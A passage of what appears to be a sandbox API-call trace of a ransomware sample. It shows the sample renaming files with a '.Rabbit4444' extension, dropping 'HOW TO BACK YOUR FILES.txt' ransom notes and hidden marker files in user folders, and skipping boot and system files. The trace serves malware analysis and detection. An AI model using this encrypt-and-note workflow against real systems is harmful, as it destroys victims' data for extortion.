10 [0052.949] lstrcmpiW (lpString1="Global.MPT", lpString2="Rabbit4444") returned -1 [0052.949] lstrlenW (lpString=".dll") returned 4 [0052.950] lstrcmpiW (lpString1=".MPT", lpString2=".dll") returned 1 [0052.950] lstrlenW (lpString=".lnk") returned 4 [0052.950] lstrcmpiW (lpString1=".MPT", lpString2=".lnk") returned 1 [0052.950] lstrlenW (lpString=".ini") returned 4 [0052.950] lstrcmpiW (lpString1=".MPT", lpString2=".ini") returned 1 [0052.950] lstrlenW (lpString=".sys") returned 4 [0052.950] lstrcmpiW (lpString1=".MPT", lpString2=".sys") returned -1 [0052.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.950] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.950] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14426066141) returned 1 [0052.950] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1244672) returned 1 [0052.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0052.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0052.950] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x130100, lpName=0x0) returned 0x298 [0052.951] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x130100) returned 0x1090000 [0052.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0052.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0052.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0052.983] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0052.984] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14429440585) returned 1 [0052.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0052.984] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0052.984] UnmapViewOfFile (lpBaseAddress=0x1090000) returned 1 [0052.995] CloseHandle (hObject=0x298) returned 1 [0052.995] CloseHandle (hObject=0x278) returned 1 [0052.995] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT.Rabbit4444") returned 83 [0052.995] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt.rabbit4444"), dwFlags=0x1) returned 1 [0052.996] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee780bf0, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x12fe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Global.MPT", cAlternateFileName="")) returned 0 [0052.996] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0052.996] lstrcpyW (in: lpString1=0x130ebb4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.996] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.998] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.998] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.000] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.000] CloseHandle (hObject=0x278) returned 1 [0053.000] CloseHandle (hObject=0x27c) returned 1 [0053.000] GetCurrentThreadId () returned 0xd98 [0053.000] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0053.000] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC" [0053.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cb28 | out: hHeap=0xe0000) returned 1 [0053.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0053.000] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC" [0053.000] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\" [0053.000] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\.BFC0E91B00AE8A0620D3" [0053.000] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\mmc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.002] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.004] FlushFileBuffers (hFile=0x27c) returned 1 [0053.005] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.005] CloseHandle (hObject=0x27c) returned 1 [0053.006] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC") returned 45 [0053.006] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.006] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc79a26a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc79a26a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe8eb00ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0053.006] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.006] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.006] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.006] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.006] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc79a26a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc79a26a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe8eb00ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.006] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.006] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.006] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.006] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.006] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.006] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8eb00ab, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8eb00ab, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8eb00ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.006] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.006] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.006] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8eb00ab, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8eb00ab, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8eb00ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.006] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0053.006] lstrcpyW (in: lpString1=0x130eb94, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.006] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MMC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\mmc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.007] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.007] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.007] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.007] CloseHandle (hObject=0x278) returned 1 [0053.007] CloseHandle (hObject=0x27c) returned 1 [0053.007] GetCurrentThreadId () returned 0xd98 [0053.007] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0053.007] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0053.007] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10e168 | out: hHeap=0xe0000) returned 1 [0053.007] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0053.007] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0053.008] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0053.008] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" [0053.008] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.010] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.013] FlushFileBuffers (hFile=0x27c) returned 1 [0053.014] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.014] CloseHandle (hObject=0x27c) returned 1 [0053.014] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 59 [0053.014] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.014] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xabc78877, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8eb00ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0053.015] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.015] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.015] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.015] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.015] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xabc78877, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xe8eb00ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.015] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.015] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.015] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.015] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.015] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.015] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8eb00ab, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8eb00ab, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8eb00ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.015] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.015] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.015] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3e2133a4, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xe4c6308a, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0053.015] lstrcmpiW (lpString1="Quick Launch", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.015] lstrcmpiW (lpString1="Quick Launch", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.015] lstrcmpiW (lpString1="Quick Launch", lpString2="Rabbit4444.exe") returned -1 [0053.015] lstrcmpiW (lpString1="Quick Launch", lpString2=".") returned 1 [0053.015] lstrcmpiW (lpString1="Quick Launch", lpString2="..") returned 1 [0053.015] lstrcmpiW (lpString1="Quick Launch", lpString2="windows") returned -1 [0053.015] lstrcmpiW (lpString1="Quick Launch", lpString2="bootmgr") returned 1 [0053.016] lstrcmpiW (lpString1="Quick Launch", lpString2="pagefile.sys") returned 1 [0053.016] lstrcmpiW (lpString1="Quick Launch", lpString2="boot") returned 1 [0053.016] lstrcmpiW (lpString1="Quick Launch", lpString2="ids.txt") returned 1 [0053.016] lstrcmpiW (lpString1="Quick Launch", lpString2="NTUSER.DAT") returned 1 [0053.016] lstrcpyW (in: lpString1=0x130ebb0, lpString2="Quick Launch" | out: lpString1="Quick Launch") returned="Quick Launch" [0053.016] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", dwFileAttributes=0x10) returned 1 [0053.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0053.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x113d78 [0053.016] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf63b0 [0053.016] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd38548cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="Rabbit4444.exe") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2=".") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="..") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="windows") returned -1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="bootmgr") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="pagefile.sys") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="boot") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="ids.txt") returned 1 [0053.016] lstrcmpiW (lpString1="UserData", lpString2="NTUSER.DAT") returned 1 [0053.016] lstrcpyW (in: lpString1=0x130ebb0, lpString2="UserData" | out: lpString1="UserData") returned="UserData" [0053.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0053.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8a) returned 0x11efc0 [0053.016] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6410 [0053.016] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd38548cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 0 [0053.016] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0053.017] lstrcpyW (in: lpString1=0x130ebb0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.017] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.017] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.018] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.018] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.018] CloseHandle (hObject=0x278) returned 1 [0053.018] CloseHandle (hObject=0x27c) returned 1 [0053.018] GetCurrentThreadId () returned 0xd98 [0053.018] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6430 [0053.018] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0053.018] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11efc0 | out: hHeap=0xe0000) returned 1 [0053.018] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0053.018] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0053.018] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0053.018] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.BFC0E91B00AE8A0620D3" [0053.018] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.020] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.022] FlushFileBuffers (hFile=0x27c) returned 1 